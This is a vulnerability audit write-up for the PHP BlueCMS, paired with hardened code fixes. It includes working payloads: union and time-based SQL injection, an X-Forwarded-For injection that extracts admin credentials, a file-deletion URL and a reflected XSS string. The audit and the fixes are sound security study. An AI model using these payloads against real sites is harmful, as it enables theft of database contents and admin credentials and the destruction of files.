ad_js SQL injection
Numeric injection (the id is used without quotes); payload:
1%20union%20select%201,2,3,4,5,6,(select%20user())
common.inc.php SQL injection
This file is included by other scripts (it presumably provides base functions or configuration), so any script that includes it can reach the injection.
For example, publish.php simply includes it.
Injection point in common.inc.php:
if(!$_SESSION['user_id'])
{
    if($_COOKIE['BLUE']['user_id'] && $_COOKIE['BLUE']['user_name'] && $_COOKIE['BLUE']['user_pwd'])
    {
        if(check_cookie($_COOKIE['BLUE']['user_name'], $_COOKIE['BLUE']['user_pwd']))
        {
            update_user_info($_COOKIE['BLUE']['user_name']);
        }
    }
    else if($_COOKIE['BLUE']['user_name'])
    {
        // user_name comes straight from the cookie and is spliced into the query text
        $user_name = $_COOKIE['BLUE']['user_name'];
        $user = $db->query("SELECT COUNT(*) AS num FROM ".table('user')." WHERE user_name='$user_name'");
        // ... rest of the branch not shown in the write-up
    }
}
If the user is not logged in and only $_COOKIE['BLUE']['user_name'] is set, the value goes straight into the SQL query; since only a count is fetched, this looks like blind injection only.
The page then redirects to the login page after a delay, so to observe the result clearly I first commented out the redirect:
Nothing is filtered; the time-based delay fires.
PoC (cookie value):
BLUE[user_name]:w4'and if(((ascii(mid((select database()),1,1)))=98),sleep(3),0)#
publish.php: arbitrary file deletion
At line 316:
The parameter $act is controllable:
The id mentioned above is controllable as well, so create a test file:
publish.php?act=del_pic&id=test.php
Visit it again:
There are many more spots like this for arbitrary file deletion; only this one is shown.
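As an added example (not publish.php's own code), here is how the act=del_pic handler would look with the id restricted to a plain image file name that must resolve inside the upload directory, plus an ownership check before the unlink. The upload directory, the blue_pic table and its columns are assumptions for the example.

```php
<?php
// Added example, not BlueCMS code: hardened act=del_pic&id=... handling.
// UPLOAD_DIR, the blue_pic table and its column names are assumptions.
define('UPLOAD_DIR', __DIR__ . '/upload/pics');

function is_safe_picture_name(string $id): bool
{
    // A plain file name only: no path separators, no "..", no NUL bytes,
    // and an image extension. "test.php", "../x.php", "a.jpg\0.php" all fail.
    return preg_match('/^[A-Za-z0-9_-]{1,64}\.(jpe?g|png|gif)$/i', $id) === 1;
}

function picture_path_inside_upload_dir(string $id): ?string
{
    if (!is_safe_picture_name($id)) {
        return null;
    }
    $base = realpath(UPLOAD_DIR);
    $path = realpath(UPLOAD_DIR . '/' . $id);
    if ($base === false || $path === false) {
        return null;                         // directory or file does not exist
    }
    // realpath() resolves symlinks and "..", so a prefix check on the result
    // keeps the target inside the upload directory even if the regex changes.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

function del_pic(PDO $db, string $id, int $current_user_id): bool
{
    $path = picture_path_inside_upload_dir($id);
    if ($path === null) {
        return false;
    }
    // Only unlink when the row belongs to the logged-in user (assumed schema).
    $stmt = $db->prepare('DELETE FROM blue_pic WHERE file_name = ? AND user_id = ?');
    $stmt->execute([$id, $current_user_id]);
    if ($stmt->rowCount() === 0) {
        return false;                        // not this user's picture
    }
    return unlink($path);
}

// Constructed inputs: only the first passes the name check.
foreach (['photo_1.jpg', 'test.php', '../config.php', "a.jpg\0.php", 'dir/x.png'] as $id) {
    printf("%-16s %s\n", addcslashes($id, "\0"), is_safe_picture_name($id) ? 'allowed' : 'rejected');
}
```

The two checks are deliberately redundant: the regex stops the obvious traversal strings at the gate, and the realpath() prefix comparison catches anything the regex might miss later (for instance a symlink inside the upload directory).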
user.php XSS
There is an XSS at the mail field.
admin/card.php XSS (reflected)
The name parameter is output directly without any filtering, so it pops straight away:
name=<script>alert(1)</script>&value=1&price=1&act=do_edit&id=1
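The fix for both the admin/card.php name parameter and the user.php mail field is the same: escape every piece of request data on output. The following is an added example, not the CMS's code; the field names mirror the request above and the form markup is an assumption.

```php
<?php
// Added example, not BlueCMS code: output escaping for the reflected values.
function e(string $s): string
{
    // ENT_QUOTES covers attribute contexts (both quote styles), ENT_SUBSTITUTE
    // avoids returning an empty string on invalid UTF-8.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable shape (do not use):
//   echo '<input name="name" value="' . $_GET['name'] . '">';
// Hardened rendering of the same form:
function render_card_form(array $get): string
{
    $name  = $get['name']  ?? '';
    $value = $get['value'] ?? '';
    $price = $get['price'] ?? '';
    return '<input name="name" value="' . e($name) . '">' . PHP_EOL
         . '<input name="value" value="' . e($value) . '">' . PHP_EOL
         . '<input name="price" value="' . e($price) . '">' . PHP_EOL;
}

// Constructed request mirroring the payload from the write-up.
$req = ['name' => '<script>alert(1)</script>', 'value' => '1', 'price' => '1'];
echo render_card_form($req);
// The name is emitted as &lt;script&gt;alert(1)&lt;/script&gt; and never executes.
```

Escaping belongs at the output site, not on input, because the same stored value may later land in HTML text, an attribute, or JavaScript, and each context needs its own encoder; a Content-Security-Policy header without 'unsafe-inline' is a useful second layer but not a substitute.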
user.php file inclusion
There is a controllable include point here, but an index.php is mostly appended after it; %00 truncation did not work, so following an online article I tried the long-path truncation idea:
under Windows the maximum directory length is 256 bytes, under Linux 4096 bytes.
That applies to version 5.2, but I still could not get the inclusion to work; count it as a pitfall.
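The robust fix does not depend on truncation behaviour at all: look the action up in a fixed map and never build an include path from request data. This is an added example, not user.php's own code; the act parameter name, the map entries and the include directory are assumptions.

```php
<?php
// Added example, not BlueCMS code: whitelist dispatch for the include target.
const ACTION_FILES = [
    'login'    => 'login/index.php',
    'register' => 'register/index.php',
    'info'     => 'info/index.php',
];

function resolve_action_file(string $act, string $include_dir): ?string
{
    // Exact key lookup: the request string is only ever used as an array key,
    // so "../" sequences, %00 and long-path truncation never reach the
    // filesystem. Unknown keys yield null instead of a guessed path.
    if (!array_key_exists($act, ACTION_FILES)) {
        return null;
    }
    return rtrim($include_dir, '/') . '/' . ACTION_FILES[$act];
}

// Vulnerable shape (do not use):
//   include './include/' . $_GET['act'] . '/index.php';
// Hardened dispatcher would be:
//   $file = resolve_action_file($_GET['act'] ?? 'login', __DIR__ . '/include');
//   if ($file === null) { http_response_code(400); exit('unknown action'); }
//   include $file;

// Constructed inputs to show what the lookup returns.
foreach (['login', 'info', '../../etc/passwd', "login\0", str_repeat('a', 5000)] as $act) {
    $file = resolve_action_file($act, '/var/www/include');
    printf("%-20s -> %s\n", substr(addcslashes($act, "\0"), 0, 20), $file ?? 'rejected');
}
```

If the list of actions is long, keep the map in one place and generate it from the directory at deploy time; what matters is that the request value selects an entry rather than spelling a path.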
comment.php XFF injection
Payload (in the X-Forwarded-For header):
1','1'),('','1','2','1','6',(select concat(admin_name,':',pwd) from blue_admin),'1','1
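All three injections above (the numeric ad_js id, the common.inc.php cookie user_name and the comment.php X-Forwarded-For insert) share one root cause, so here is one added example, not BlueCMS code, showing the same queries with PDO prepared statements and the XFF value replaced by the socket address. Table and column names are assumptions; the demo runs against an in-memory SQLite database with constructed rows.

```php
<?php
// Added example, not BlueCMS code: parameterised versions of the spliced queries.
// Table and column names (blue_ad, blue_user, blue_comment) are assumptions.

function ad_by_id(PDO $db, string $raw_id): ?array
{
    // Numeric parameter: cast first, then bind. "1 union select ..." becomes 1.
    $id = (int) $raw_id;
    $stmt = $db->prepare('SELECT ad_id, ad_name FROM blue_ad WHERE ad_id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function count_users_by_name(PDO $db, string $user_name): int
{
    // The cookie value is bound as data, never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT COUNT(*) AS num FROM blue_user WHERE user_name = :name');
    $stmt->execute([':name' => $user_name]);
    return (int) $stmt->fetchColumn();
}

function client_ip(array $server): string
{
    // X-Forwarded-For is client-supplied; REMOTE_ADDR comes from the socket.
    // Only consult XFF behind a trusted proxy, and validate whatever is stored.
    $ip = $server['REMOTE_ADDR'] ?? '';
    return filter_var($ip, FILTER_VALIDATE_IP) !== false ? $ip : '0.0.0.0';
}

function insert_comment(PDO $db, int $post_id, int $user_id, string $content, string $ip): int
{
    $stmt = $db->prepare(
        'INSERT INTO blue_comment (post_id, user_id, content, ip, ctime) VALUES (?, ?, ?, ?, ?)'
    );
    $stmt->execute([$post_id, $user_id, $content, $ip, time()]);
    return (int) $db->lastInsertId();
}

// Constructed schema and rows in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE blue_ad (ad_id INTEGER PRIMARY KEY, ad_name TEXT)');
$db->exec("INSERT INTO blue_ad VALUES (1, 'banner')");
$db->exec('CREATE TABLE blue_user (user_id INTEGER PRIMARY KEY, user_name TEXT)');
$db->exec("INSERT INTO blue_user (user_name) VALUES ('w4')");
$db->exec('CREATE TABLE blue_comment (id INTEGER PRIMARY KEY, post_id INT, user_id INT, content TEXT, ip TEXT, ctime INT)');

// The payloads quoted in the write-up are now plain data.
var_dump(ad_by_id($db, '1 union select 1,2,3,4,5,6,(select user())'));      // only the banner row
var_dump(count_users_by_name($db, 'w4'));                                    // int(1)
var_dump(count_users_by_name($db, "w4'and if(((ascii(mid((select database()),1,1)))=98),sleep(3),0)#")); // int(0), no delay

// The XFF header is ignored; the stored ip is the validated socket address.
$server = [
    'REMOTE_ADDR'          => '203.0.113.5',
    'HTTP_X_FORWARDED_FOR' => "1','1'),('','1','2','1','6',(select concat(admin_name,':',pwd) from blue_admin),'1','1",
];
insert_comment($db, 1, 1, 'hello', client_ip($server));
var_dump($db->query('SELECT ip FROM blue_comment')->fetchColumn());          // string "203.0.113.5"
```

Binding parameters keeps the query structure fixed by the code, so a quote or a comment marker inside the value cannot close the string and append a second statement; the cast on the numeric path is what prevents the unquoted union from the first section.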
tpl_manage.php: arbitrary file modification
user.php: open redirect (arbitrary jump)
Perhaps this could be used for SSRF or the like; the target parameter needs to be base64-encoded.
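A redirect parameter should only ever select a local path or a URL on the site's own host. The following added example (not user.php's own code) validates the target after the base64 decoding the write-up mentions; the parameter handling and the allowed host are assumptions.

```php
<?php
// Added example, not BlueCMS code: restrict where the jump may go.
function safe_redirect_target(string $raw, string $own_host, string $default = '/index.php'): string
{
    // The write-up notes the target is base64-encoded; decode strictly and only
    // accept the decoded form when it round-trips, otherwise treat $raw as-is.
    $decoded = base64_decode($raw, true);
    $target  = ($decoded !== false && base64_encode($decoded) === $raw) ? $decoded : $raw;

    // A site-relative path: exactly one leading "/", not "//host" or "/\host",
    // and no CR/LF that could smuggle extra headers.
    if (preg_match('#^/(?![/\\\\])[^\r\n]*$#', $target) === 1) {
        return $target;
    }

    // An absolute URL is allowed only with http(s) and our own host name.
    $parts = parse_url($target);
    if (is_array($parts)
        && isset($parts['scheme'], $parts['host'])
        && in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        && strcasecmp($parts['host'], $own_host) === 0
        && !isset($parts['user'], $parts['pass'])) {
        return $target;
    }
    return $default;
}

// Usage in the handler would be:
//   header('Location: ' . safe_redirect_target($_GET['url'] ?? '', $_SERVER['HTTP_HOST']));

// Constructed inputs against an assumed own host of example.org.
$cases = [
    '/user.php?act=info',
    base64_encode('http://example.com/'),
    base64_encode('https://example.org/user.php'),
    '//example.com/x',
    "/ok\r\nSet-Cookie: a=b",
    'http://example.org@example.com/',
];
foreach ($cases as $u) {
    printf("%-44s -> %s\n", addcslashes($u, "\r\n"), safe_redirect_target($u, 'example.org'));
}
```

The same check answers the SSRF question from the note: if the server itself ever fetches the decoded URL instead of redirecting the browser to it, the host comparison is what keeps internal addresses out of reach, and for server-side fetches it should be tightened further to an explicit allow-list of hosts.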
Summary
Looking at a CMS for the first time, I did not know where to start; some weak points and even fairly obvious holes I sometimes failed to notice. Still, the code of a small CMS is not that complicated and its vulnerabilities are relatively simple and easy to exploit, so it is a good place to begin; the harvest was modest. The main takeaway from this audit is to start from user input and trace where it goes. Does that count as a little progress? (Nah)